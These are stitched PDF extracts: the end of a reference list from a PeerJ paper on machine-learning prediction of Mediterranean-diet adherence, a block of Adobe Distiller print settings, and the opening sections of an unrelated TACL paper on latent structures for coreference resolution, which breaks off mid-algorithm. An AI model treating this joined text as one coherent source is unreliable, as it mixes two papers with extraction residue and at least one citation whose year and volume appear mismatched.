JW. 2016. Genome co-amplification upregulates a mitotic gene network activity that predicts outcome and response to mitotic protein inhibitors in breast cancer. Breast Cancer Research 18(1):70 DOI 10.1186/s13058-016-0728-y. Estruch R, Ros E, Salas-Salvadó J, Covas MI, Corella D, Arós F, Gómez-Gracia E, Ruiz-Gutiérrez V, Lapetra J, Lamuela-Raventos RM, Serra-Majem L, Pintó X, Basora J, Muñoz MA, Sorli JV, Martinez JA, Fitó M, Gea A, Hernan MA, Martinez-Gonzalez MA, for the PREDIMED Study Investigators. 2018. Primary prevention of cardiovascular disease with a mediterranean diet supplemented with extra-virgin olive oil or nuts. New England Journal of Medicine 378(25):e34 DOI 10.1056/NEJMoa1800389. Jover E. 1997. Índice cintura/cadera—obesidad y riesgo cardiovascular. Anales De Medicina Interna 14:1–2. Kanjo E, Younis E, Sherkat N. 2018. Towards unravelling the relationship between on-body, environmental and emotion data using sensor information fusion approach. Information Fusion 40:18–31. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 17/21 http://dx.doi.org/10.1016/S2213-8587(16)30085-7 http://dx.doi.org/10.1016/j.patrec.2005.10.010 http://dx.doi.org/10.7717/peerj.2721 http://dx.doi.org/10.1038/srep19256 http://dx.doi.org/10.1016/S0140-6736(10)62037-5 http://dx.doi.org/10.5282/ubm/epub.1769 http://dx.doi.org/10.1186/s13058-016-0728-y http://dx.doi.org/10.1056/NEJMoa1800389 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Kim J, Bowlby R, Mungall AJ, Robertson AG, Odze RD, Cherniack AD, Shih J, Pedamallu CS, Cibulskis C, Dunford A, Meier SR, Kim J, Raphael BJ, Wu H-T, Wong AM, Willis JE, Bass AJ, Derks S, Garman K, McCall SJ, Wiznerowicz M, Pantazi A, Parfenov M, Thorsson V, Shmulevich I, Dhankani V, Miller M, Sakai R, Wang K, Schultz N, Shen R, Arora A, Weinhold N, Sánchez-Vega F, Kelsen DP, Zhang J, Felau I, Demchok J, Rabkin CS, Camargo MC, Zenklusen JC, Bowen J, Leraas K, Lichtenberg TM, Curtis C, Seoane JA, Ojesina AI, Beer DG, Gulley ML, Pennathur A, Luketich JD, Zhou Z, Weisenberger DJ, Akbani R, Lee J-S, Liu W, Mills GB, Zhang W, Reid BJ, Hinoue T, Laird PW, Shen H, Piazuelo MB, Schneider BG, McLellan M, Taylor-Weiner A, Cibulskis C, Lawrence M, Cibulskis K, Stewart C, Getz G, Lander E, Gabriel SB, Ding L, McLellan MD, Miller CA, Appelbaum EL, Cordes MG, Fronick CC, Fulton LA, Mardis ER, Wilson RK, Schmidt HK, Fulton RS, Ally A, Balasundaram M, Bowlby R, Carlsen R, Chuah E, Dhalla N, Holt RA, Jones SJM, Kasaian K, Brooks D, Li HI, Ma Y, Marra MA, Mayo M, Moore RA, Mungall AJ, Mungall KL, Robertson AG, Schein JE, Sipahimalani P, Tam A, Thiessen N, Wong T, Cherniack AD, Shih J, Pedamallu CS, Beroukhim R, Bullman S, Cibulskis C, Murray BA, Saksena G, Schumacher SE, Gabriel S, Meyerson M, Hadjipanayis A, Kucherlapati R, Pantazi A, Parfenov M, Ren X, Park PJ, Lee S, Kucherlapati M, Yang L, Baylin SB, Hoadley KA, Weisenberger DJ, Bootwalla MS, Lai PH, Van Den Berg DJ, Berrios M, Holbrook A, Akbani R, Hwang J-E, Jang H-J, Liu W, Weinstein JN, Lee J-S, Lu Y, Sohn BH, Mills G, Seth S, Protopopov A, Bristow CA, Mahadeshwar HS, Tang J, Song X, Zhang J, Laird PW, Hinoue T, Shen H, Cho J, Defrietas T, Frazer S, Gehlenborg N, Heiman DI, Lawrence MS, Lin P, Meier SR, Noble MS, Voet D, Zhang H, Kim J, Polak P, Saksena G, Chin L, Getz G, Wong AM, Raphael BJ, Wu H-T, Lee S, Park PJ, Yang L, Thorsson V, Bernard B, Iype L, Miller M, Reynolds SM, Shmulevich I, Dhankani V, Abeshouse A, Arora A, Armenia J, Kundra R, Ladanyi M, Lehmann K-V, Gao J, Sander C, Schultz N, Sánchez-Vega F, Shen R, Weinhold N, Chakravarty D, Zhang H, Radenbaugh A, Hegde A, Akbani R, et al. 2017. Integrated genomic characterization of oesophageal carcinoma. Nature 541(7636):169–175. Krzysztoszek J, Wierzejska E, Zielińska A. 2015. Obesity: an analysis of epidemiological and prognostic research. Archives of Medical Science 11(1):24–33. Lack G, Fox D, Northstone K, Golding J. 2003. Factors associated with the development of peanut allergy in childhood. New England Journal of Medicine 348(11):977–985. Li X, Li J, Wu Y. 2015. A global optimization approach to multi-polarity sentiment analysis. PLOS ONE 10(4):1–18. López-Sobaler AM, Aparicio A, Aranceta-Bartrina J, Gil Á, González-Gross M, Serra-Majem L, Varela-Moreiras G, Ortega RM. 2016. Overweight and general and abdominal obesity in a representative sample of spanish adults: findings from the ANIBES study. BioMed Research International 2016:8341487. Machado P, Romero J, Nadal M, Santos A, Correia J, Carballal A. 2015. Computerized measures of visual complexity. Acta Psychologica 160:43–57 DOI 10.1016/j.actpsy.2015.06.005. Martínez-González MA, García-López M, Bes-Rastrollo M, Toledo E, Martínez-Lapiscina EH, Delgado-Rodriguez M, Vazquez Z, Benito S, Beunza JJ. 2011. Mediterranean diet and the incidence of cardiovascular disease: a Spanish cohort. Nutrition, Metabolism and Cardiovascular Diseases 21(4):237–244. Martínez-González MA, Salas-Salvadó J, Estruch R, Corella D, Fitó M, Ros E. 2015. Benefits of the Mediterranean diet: insights from the PREDIMED study. Progress in Cardiovascular Diseases 58(1):50–60 DOI 10.1016/j.pcad.2015.04.003. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 18/21 http://dx.doi.org/10.1016/j.actpsy.2015.06.005 http://dx.doi.org/10.1016/j.pcad.2015.04.003 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Marventano S, Godos J, Platania A, Galvano F, Mistretta A, Grosso G. 2017. Mediterranean diet adherence in the Mediterranean healthy eating, aging and lifestyle (MEAL) study cohort. International Journal of Food Sciences and Nutrition 69(1):1–8. Melaku YA, Gill TK, Taylor AW, Adams R, Shi Z. 2017. Association between nutrient patterns and bone mineral density among ageing adults. Clinical Nutrition ESPEN 22:97–106 DOI 10.1016/j.clnesp.2017.08.001. Míguez Bernárdez M, De la Montaña Miguélez J, González Carnero J, González Rodríguez M. 2011. Concordancia entre la autopercepción de la imagen corporal y el estado nutricional en universitarios de Orense. Nutricion Hospitalaria 26(3):472–479. Norman K, Smoliner C, Valentini L, Lochs H, Pirlich M. 2007. Is bioelectrical impedance vector analysis of value in the elderly with malnutrition and impaired functionality? Nutrition 23(7–8):564–569 DOI 10.1016/j.nut.2007.05.007. Ortega Anta RM, López Sobaler AM. 2014. Primeras Jornadas UCM-ASEN Avances y controversias en nutricion y salud. Nutrición Hospitalaria 30(2):21–28. Pons P, Jaen J, Catala A. 2017. Assessing machine learning classifiers for the detection of animals’ behavior using depth-based tracking. Expert Systems with Applications 86:235–246 DOI 10.1016/j.eswa.2017.05.063. Pérez C, Aranceta J. 2011. ¿Es posible la dieta Mediterránea en el siglo XXI? In: Alonso E, Varela G, Silvestre D, eds. La dieta Mediterránea en el marco de la nutrición comunitaria: luces y sombras. Madrid: Instituto Tomás Pascual Sanz, 147–162. Pérez-Caballero G, Andrade J, Olmos P, Molina Y, Jiménez I, Durán J, Fernandez-Lozano C, Miguel-Cruz F. 2017. Authentication of tequilas using pattern recognition and supervised classification. TrAC—Trends in Analytical Chemistry 94:117–129. R Core Team. 2016. R: a language and environment for statistical computing. Vienna: The R Foundation for Statistical Computing. Available at http://www.R-project.org/. Ravasco P, Anderson H, Mardones F. 2010. Métodos de valoración del estado nutricional. Nutricion Hospitalaria 25(Suppl. 3):57–66. Rodriguez A, Fernandez-Lozano C, Dorado J, Rabuñal JR. 2014. Two-dimensional gel electrophoresis image registration using block-matching techniques and deformation models. Analytical Biochemistry 454:53–59 DOI 10.1016/j.ab.2014.02.027. Rodriguez Rodriguez E, Lopez Plaza B, Lopez Sobaler M, Ortega R. 2011. Prevalencia de sobrepeso y obesidad en adultos españoles. Nutricion Hospitalaria 26(2):355–363. Rolland Y, Lauwers-Cances V, Cournot M, Nourhashémi F, Reynish W, Rivière D, Vellas B, Grandjean H. 2003. Sarcopenia, calf circumference, and physical function of elderly women: a cross-sectional study. Journal of the American Geriatrics Society 51(8):1120–1124 DOI 10.1046/j.1532-5415.2003.51362.x. Romero Pérez A, Rivas Velasco A. 2014. Adherence to Mediterranean diet and bone health. Nutricion Hospitalaria 29(5):989–996. Saeys Y, Inza I, Larrañaga P. 2007. A review of feature selection techniques in bioinformatics. Bioinformatics 23(19):2507–2517 DOI 10.1093/bioinformatics/btm344. Samworth RJ. 2012. Optimal weighted nearest neighbour classifiers. Annals of Statistics 40(5):2733–2763 DOI 10.1214/12-AOS1049. Savanelli MC, Barrea L, Macchia PE, Savastano S, Falco A, Renzullo A, Scarano E, Nettore IC, Colao A, Di Somma C. 2017. Preliminary results demonstrating the impact of Mediterranean diet on bone health. Journal of Translational Medicine 15(1):81 DOI 10.1186/s12967-017-1184-x. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 19/21 http://dx.doi.org/10.1016/j.clnesp.2017.08.001 http://dx.doi.org/10.1016/j.nut.2007.05.007 http://dx.doi.org/10.1016/j.eswa.2017.05.063 http://www.R-project.org/ http://dx.doi.org/10.1016/j.ab.2014.02.027 http://dx.doi.org/10.1046/j.1532-5415.2003.51362.x http://dx.doi.org/10.1093/bioinformatics/btm344 http://dx.doi.org/10.1214/12-AOS1049 http://dx.doi.org/10.1186/s12967-017-1184-x http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Serra-Majem L, Roman B, Estruch R. 2006. Scientific evidence of interventions using the Mediterranean diet: a systematic review. Nutrition Reviews 64(2 Pt 2):S27–S47 DOI 10.1111/j.1753-4887.2006.tb00232.x. Shapira N. 2017. The potential contribution of dietary factors to breast cancer prevention. European Journal of Cancer Prevention 26(5):385–395 DOI 10.1097/CEJ.0000000000000406. Shapiro SS, Wilk MB. 1965. An analysis of variance test for normality (complete samples). Biometrika 52(3–4):591–611 DOI 10.1093/biomet/52.3-4.591. Skoraczyñski G, Dittwald P, Miasojedow B, Szymkuć S, Gajewska EP, Grzybowski BA, Gambin A. 2017. Predicting the outcomes of organic reactions via machine learning: are current descriptors sufficient? Scientific Reports 7(1):3582 DOI 10.1038/s41598-017-02303-0. Sofi F, Macchi C, Abbate R, Gensini GF, Casini A. 2014. Mediterranean diet and health status: an updated meta-analysis and a proposal for a literature-based adherence score. Public Health Nutrition 17(12):2769–2782 DOI 10.1017/S1368980013003169. Srivastava R, Batra A, Dhawan D, Bakhshi S. 2017. Association of energy intake and expenditure with obesity: a cross-sectional study of 150 pediatric patients following treatment for leukemia. Pediatric Hematology and Oncology 34(1):29–35 DOI 10.1080/08880018.2016.1272025. Sámano R, Rodríguez-ventura A, Sánchez-jiménez B, Godínez E, Noriega A, Zelonka R, Garza M, Nieto J. 2015. Satisfacción de la imagen corporal en adolescentes y adultos mexicanos y su relación con la autopercepción corporal y el índice de masa corporal real. Nutricion Hospitalaria 31(3):1082–1088. Štefan L, Čule M, Milinović I, Sporiš G, Juranko D. 2017. The relationship between adherence to the Mediterranean diet and body composition in Croatian university students. European Journal of Integrative Medicine 13(Suppl. C):41–46. Tibshirani R. 1994. Regression selection and shrinkage via the lasso. Journal of the Royal Statistical Society, Series B (Methodological) 58(1):267–288. Travé TD, Castroviejo A. 2011. Adherencia a la dieta mediterránea en la población universitaria. Nutrición Hospitalaria 26(3):602–608. Trichopoulou A. 2004. Traditional Mediterranean diet and longevity in the elderly: a review. Public Health Nutrition 7(7):943–947 DOI 10.1079/PHN2004558. Trichopoulou A, Bamia C, Norat T, Overvad K, Schmidt EB, Tjonneland A, Halkjær J, Clavel-Chapelon F, Vercambre M-N, Boutron-Ruault M-C, Linseisen J, Rohrmann S, Boeing H, Weikert C, Benetou V, Psaltopoulou T, Orfanos P, Boffetta P, Masala G, Pala V, Panico S, Tumino R, Sacerdote C, De-Mesquita HBB, Ocke MC, Peeters PH, Van der Schouw YT, González C, Sanchez MJ, Chirlaque MD, Moreno C, Larrañaga N, Van Guelpen B, Jansson J-H, Bingham S, Khaw K-T, Spencer EA, Key T, Riboli E, Trichopoulos D. 2007. Modified Mediterranean diet and survival after myocardial infarction: the EPIC-Elderly study. European Journal of Epidemiology 22(12):871–881 DOI 10.1007/s10654-007-9190-6. UNESCO. 2010. The Mediterranean diet inscription on the representative list of the intangible cultural heritage of humanity. Available at https://ich.unesco.org/doc/src/17331-EN.pdf. Vapnik VN. 1995. The nature of statistical learning theory. New York: Springer New York, Inc. Vert JP, Tsuda K, Schölkopf B. 2004. A primer on kernel methods, Kernel methods in computational biology. London: MIT Press, 35–70. Widmer RJ, Flammer AJ, Lerman LO, Lerman A. 2015. The Mediterranean diet, its components, and cardiovascular disease. American Journal of Medicine 128(3):229–238 DOI 10.1016/j.amjmed.2014.10.014. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 20/21 http://dx.doi.org/10.1111/j.1753-4887.2006.tb00232.x http://dx.doi.org/10.1097/CEJ.0000000000000406 http://dx.doi.org/10.1093/biomet/52.3-4.591 http://dx.doi.org/10.1038/s41598-017-02303-0 http://dx.doi.org/10.1017/S1368980013003169 http://dx.doi.org/10.1080/08880018.2016.1272025 http://dx.doi.org/10.1079/PHN2004558 http://dx.doi.org/10.1007/s10654-007-9190-6 https://ich.unesco.org/doc/src/17331-EN.pdf http://dx.doi.org/10.1016/j.amjmed.2014.10.014 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Zaragoza Martí A, Ferrer Cascales R, Cabañero Martínez MJ, Hurtado Sánchez JA, Laguna Pérez A. 2015. Adherencia a la dieta mediterránea y su relación con el estado nutricional en personas mayores. Nutrición Hospitalaria 31(4):1667–1674. Zou H, Hastie T. 2005. Regularization and variable selection via the elastic net. Journal of the Royal Statistical Society: Series B Statistical Methodology 67(2):301–320 DOI 10.1111/j.1467-9868.2005.00503.x. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 21/21 http://dx.doi.org/10.1111/j.1467-9868.2005.00503.x https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.287 Identification of predictive factors of the degree of adherence to the Mediterranean diet through machine-learning techniques Introduction Materials and Methods Results Discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_6n2v2a3dwvgbndggzshipvmfpy ---- Latent Structures for Coreference Resolution Sebastian Martschat and Michael Strube Heidelberg Institute for Theoretical Studies gGmbH Schloss-Wolfsbrunnenweg 35, 69118 Heidelberg, Germany (sebastian.martschat|michael.strube)@h-its.org Abstract Machine learning approaches to coreference resolution vary greatly in the modeling of the problem: while early approaches operated on the mention pair level, current research fo- cuses on ranking architectures and antecedent trees. We propose a unified representation of different approaches to coreference reso- lution in terms of the structure they operate on. We represent several coreference reso- lution approaches proposed in the literature in our framework and evaluate their perfor- mance. Finally, we conduct a systematic anal- ysis of the output of these approaches, high- lighting differences and similarities. 1 Introduction Coreference resolution is the task of determining which mentions in a text are used to refer to the same real-world entity. The era of statistical natural lan- guage processing saw the shift from rule-based ap- proaches (Hobbs, 1976; Lappin and Leass, 1994) to increasingly sophisticated machine learning models. While early approaches cast the problem as binary classification of mention pairs (Soon et al., 2001), recent approaches make use of complex structures to represent coreference relations (Yu and Joachims, 2009; Fernandes et al., 2014). The aim of this paper is to devise a framework for coreference resolution that leads to a unified rep- resentation of different approaches to coreference resolution in terms of the structure they operate on. Previous work in other areas of natural lan- guage processing such as parsing (Klein and Man- ning, 2001) and machine translation (Lopez, 2009) has shown that providing unified representations of approaches to a problem deepens its understanding and can also lead to empirical improvements. By im- plementing popular approaches in this framework, we can highlight structural differences and similar- ities between them. Furthermore, this establishes a setting to systematically analyze the contribution of the underlying structure to performance, while fix- ing parameters such as preprocessing and features. In particular, we analyze approaches to corefer- ence resolution and point out that they mainly dif- fer in the structures they operate on. We then note that these structures are not annotated in the train- ing data (Section 2). Motivated by this observation, we develop a machine learning framework for struc- tured prediction with latent variables for coreference resolution (Section 3). We formalize the mention pair model (Soon et al., 2001; Ng and Cardie, 2002), mention ranking architectures (Denis and Baldridge, 2008; Chang et al., 2012) and antecedent trees (Fer- nandes et al., 2014) in our framework and high- light key differences and similarities (Section 4). Fi- nally, we present an extensive comparison and anal- ysis of the implemented approaches, both quantita- tive and qualitative (Sections 5 and 6). Our analy- sis shows that a mention ranking architecture with latent antecedents performs best, mainly due to its ability to structurally model determining anaphoric- ity. Finally, we briefly describe how entity-centric approaches fit into our framework (Section 7). An open source toolkit which implements the ma- chine learning framework and the approaches dis- cussed in this paper is available for download1. 1http://smartschat.de/software 405 Transactions of the Association for Computational Linguistics, vol. 3, pp. 405–418, 2015. Action Editor: Mark Johnson. Submission batch: 3/2015; Revision batch 6/2015; Published 7/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. 2 Modeling Coreference Resolution The aim of automatic coreference resolution is to predict a clustering of mentions such that each clus- ter contains all mentions that are used to refer to the same entity. However, most coreference resolution models reduce the problem to predicting coreference between pairs of mentions, and jointly or cascad- ingly consolidating these predictions. Approaches differ in the scope (pairwise, per anaphor, per docu- ment, ...) they employ while learning a scoring func- tion for these pairs, and the way the consolidating is handled. The different ways to employ the scope and to consolidate decisions can be understood as operat- ing on latent structures: as pairwise links are not annotated in the data, coreference approaches create structures (either heuristically or data-driven) that guide the learning of the pairwise scoring function. To understand this better, let us consider two ex- amples. Mention pair models (Soon et al., 2001; Ng and Cardie, 2002) cast the problem as first cre- ating a list of mention pairs, and deciding for each pair whether the two mentions are coreferent. Af- terwards the decisions are consolidated by a cluster- ing algorithm such as best-first or closest-first. We therefore can consider this approach to operate on a list of mention pairs where each pair is handled in- dividually. In contrast, antecedent tree models (Fer- nandes et al., 2014; Björkelund and Kuhn, 2014) consider the whole document at once and predict a tree consisting of anaphor-antecedent pairs. 3 A Structured Prediction Framework In this section we introduce a structured prediction framework for learning coreference predictors with latent variables. When devising the framework, we focus on accounting for the latent structures under- lying coreference resolution approaches. The frame- work is a generalization of previous work on latent antecedents and trees for coreference resolution (Yu and Joachims, 2009; Chang et al., 2012; Fernandes et al., 2014). 3.1 Setting In all prediction tasks, the goal is to learn a mapping f from inputs x ∈ X to outputs y ∈ Yx. A predic- tion task is structured if the output elements y ∈Yx exhibit some structure. As we work in a latent vari- able setting, we assume that Yx = Hx ×Zx, and therefore y = (h,z) ∈ Hx × Zx. We call h the hidden or latent part, which is not observed in the data, and z the observed part (during training). We assume that z can be inferred from h, and that in a pair (h,z), h and z are always consistent. We first define the input space X and the output spaces Hx and Zx for x ∈X . 3.2 The Input Space X The input space consists of documents. We repre- sent a document x ∈ X as follows. Let us assume that Mx is the set of mentions (expressions which may be used to refer to entities) in the document. We write Mx = {m1, . . . ,mk}, where the mi are in ascending order with respect to their position in the document. We then consider M0x = {m0} ∪ Mx, where m0 precedes every mi ∈ Mx (Chang et al., 2012; Fernandes et al., 2014). m0 plays the role of a dummy mention for anaphoricity detection: if m0 is chosen as the an- tecedent, the corresponding mention is deemed as non-anaphoric. This enables joint coreference reso- lution and anaphoricity determination. 3.3 The Latent Space Hx for an Input x Let x ∈X be some document. As we saw in the pre- vious section, approaches to coreference resolution predict a latent structure which is not annotated in the data but is used to infer coreference information. Inspired by previous work on coreference (Bengtson and Roth, 2008; Fernandes et al., 2014; Martschat and Strube, 2014), we now develop a graph-based representation for these structures. A valid latent structure for the document x is a labeled directed graph h = (V,A,LA) where • the set of nodes are the mentions, V = M0x, • the set of edges A consists of links between mentions pointing back in the text, A ⊆{(mj,mi) |j > i}⊆ Mx ×M0x. • LA : A → L assigns a label ` ∈ L to each edge. L is a finite set of labels, for example signaling coreference or non-coreference. We split h into subgraphs (called substructures from now on), which we notate as h = h1⊕. . .⊕hn, 406 with hi = (Vi,Ai,LAi) ∈ Hx,i, where Hx,i is the latent space for an input x restricted to the mentions appearing in hi. hi encodes coreference decisions for a subset of mentions in x. m0 m1 m2 m3 − + − − + + Figure 1: Graph-based representation of the mention pair model. The dashed box shows one substructure of the structure. Figure 1 depicts a graph that captures the latent structure underlying the mention pair model. Men- tion pairs are represented as node connected by an edge. The edge either has label “+” (if the mentions are coreferent) or “−” (otherwise). As the mention pair model considers each mention pair individually, each edge is one substructure of the latent structure (expressed via the dashed box). We describe this representation in more detail in Section 4.1. 3.4 The Observed Output Space Zx for an Input x Let x ∈X be some document. The observed output space consists of all functions ex : Mx → N that map mentions to entity identifiers. Two mi,mj ∈ Mx are coreferent if and only if ex(mi) = ex(mj). ex is inferred from the latent structure, e.g. by taking the transitive closure over coreference decisions. This representation corresponds to the way coref- erence is annotated in corpora. 3.5 Linear Models Let us write H = ∪x∈XHx for the full latent space (analogously Z). Our goal is to learn the mapping f : X → H×Z. We assume that the mapping is parametrized by a weight vector θ ∈ Rd, and there- fore write f = fθ. We restrict ourselves to linear models. That is, fθ(x) = arg max (h,z)∈Hx×Zx 〈θ,φ(x,h,z)〉, where φ: X ×H×Z → Rd is a joint feature func- tion for inputs and candidate outputs. Since h = h1 ⊕ . . .⊕hn, we have fθ(x) = arg max (h,z)∈Hx×Zx 〈θ,φ(x,h,z)〉 = n⊕ i=1 arg max (hi,z)∈Hx,i×Zx 〈θ,φ(x,hi,z)〉. In this paper, we only consider feature functions which factor with respect to the edges in hi = (Vi,Ai,LAi), i.e. φ(x,hi,z) = ∑ a∈Ai φ(x,a,z). Hence, the features examine properties of mention pairs, such as head word of each mention, number of each mention, or the existence of a string match. We describe the feature set used for all approaches represented in our framework in Section 5.2. 3.6 Decoding Given an input x ∈ X and a weight vector θ ∈ Rd, we obtain the prediction by solving the arg max equation described in the previous subsection. This can be viewed as searching the output space Hx×Zx for the highest scoring output pair (h,z). The details of the search procedure depend on the space Hx of latent structures and the factorization into substructures. For the structures we consider in this paper, the maximization can be solved exactly via greedy search. For structures with complex con- straints like transitivity, more complex or even ap- proximate search methods need to be used (Klenner, 2007; Finkel and Manning, 2008). 3.7 Learning We assume a supervised learning setting with latent variables, i.e., we have a training set of documents D = {( x(i),z(i) ) | i = 1, . . . ,m } at our disposal. Note that the latent structures are not encoded in this training set. In principle we would like to directly optimize for the evaluation metric we are interested in. Un- fortunately, the evaluation metrics used in corefer- ence do not allow for efficient optimization based on mention pairs, since they operate on the entity level. For example, the CEAFe metric (Luo, 2005) needs to compute optimal entity alignments between gold and system entities. These alignments do not factor with respect to mention pairs. We therefore have to use some surrogate loss. 407 Algorithm 1 Structured latent perceptron with cost- augmented inference. Input: Training set D, a cost function c, number of epochs n. function PERCEPTRON(D, c, n) set θ = (0, . . . ,0) for epoch = 1, . . . ,n do for (x,z) ∈D do for each substructure do ĥopt,i = arg max hi∈const(Hx,z,i) 〈θ,φ(x,hi,z)〉 (ĥi, ẑ) = arg max (hi,z)∈Hx,i×Zx (〈θ,φ(x,hi,z)〉 +c(x,hi, ĥopt,i,z)) if ĥi does not partially encode z then set θ = θ + φ(x,ĥopt,i,z) −φ(x,ĥi, ẑ) Output: A weight vector θ. We employ a structured latent perceptron (Sun et al., 2009) extended with cost-augmented inference (Crammer et al., 2006) to learn the parameters of the models we discuss. While this restricts us to a particular objective to optimize, it comes with var- ious advantages: the implementation is simple and fast, we can incorporate error functions via cost- augmentation, the structures are plug-and-play if we provide a decoder, and the (structured) perceptron with cost-augmented inference has exhibited good performance for coreference resolution (Chang et al., 2012; Fernandes et al., 2014). To describe the algorithm, we need some addi- tional terminology. Let (x,z) be a training exam- ple. Let (ĥ, ẑ) = fθ(x) be the prediction under the model parametrized by θ. Let Hx,z be the space of all latent structures for an input x that are consistent with a coreference output z. Structures in Hx,z pro- vide substitutes for gold structures in training. Some approaches restrict Hx,z, for example by learning only from the closest antecedent of a mention (Denis and Baldridge, 2008). Hence, we consider the con- strained space const(Hx,z) ⊆ Hx,z, where const is a function that depends on the approach in focus. ĥopt = arg max h∈const(Hx,z) 〈θ,φ(x,h,z)〉 is the optimal constrained latent structure under the current model which is consistent with z. We write ĥi and ĥopt,i for the ith substructure of the latent structure. To estimate θ, we iterate over the training data. For each input, we compute the optimal constrained prediction consistent with the gold information, ĥopt,i. We then compute the optimal prediction (ĥi, ẑ), 